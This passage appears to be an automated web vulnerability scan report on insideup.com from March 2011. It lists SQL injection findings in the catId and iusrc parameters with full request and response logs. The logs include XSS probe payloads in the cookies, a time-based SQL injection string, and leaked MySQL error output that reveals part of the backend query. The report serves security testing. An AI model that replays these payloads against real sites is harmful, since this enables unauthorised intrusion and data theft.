OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:55:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=npn8t2n0rrpdu5fthp3g6240n4; path=/
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?ca'' OR prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?ca'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/leadflow/bulo00/project.php?ca'/'
   union select prj.catId,prj.gr' at line 5

Request 2

GET /ppc/leadflow/bulo00/leadflow/bulo00/project.php?ca'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:55:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mhbhamn6let8qcgc31t7404751; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/leadflow/bulo00/project.php was not found on this server.</p>

1.8. http://www.insideup.com/ppc/leadflow/bulo00/leadflow/bulo00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/leadflow/bulo00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/leadflow/bulo00/project.php?catId=' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:52:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jaslbsv30s2evm42mt5af3d200; path=/
Content-Length: 2214
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?catId='' OR prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?catId='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/leadflow/bulo00/project.php?catId='/'
   union select prj.catId,pr' at line 5

Request 2

GET /ppc/leadflow/bulo00/leadflow/bulo00/project.php?catId='' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:52:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mml5oa8m8bbbvcmr3vu4o3ndk0; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/leadflow/bulo00/project.php was not found on this server.</p>

1.9. http://www.insideup.com/ppc/leadflow/bulo00/leadflow/bulo00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/leadflow/bulo00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/leadflow/bulo00/project.php?catId=30005&iusrc=' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001179)%3C/script%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 